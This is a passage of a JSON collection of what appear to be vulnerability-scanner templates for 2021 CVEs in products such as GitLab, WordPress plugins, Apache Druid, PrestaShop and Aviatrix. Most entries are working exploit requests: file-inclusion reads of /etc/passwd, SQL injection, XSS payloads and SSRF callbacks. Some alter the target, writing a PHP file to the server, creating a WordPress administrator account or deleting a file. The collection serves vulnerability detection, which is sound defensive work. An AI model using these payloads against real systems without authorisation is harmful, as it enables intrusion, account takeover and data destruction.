Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n","GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)","sidekiq"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-25016","info":{"name":"Chaty < 2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["search=</script><img src onerror=alert(document.domain)>","chaty_page_chaty"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33690","info":{"name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /tc.CBS.Appl/tcspseudo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Could not connect to the CBS"]}]}]},{"id":"CVE-2021-45811","info":{"name":"osTicket 1.15.x - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"FROM (SELECT\", \"topic_id_val\\'\\' IN NATURAL\", \"ORDER BY relevance\")"]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information 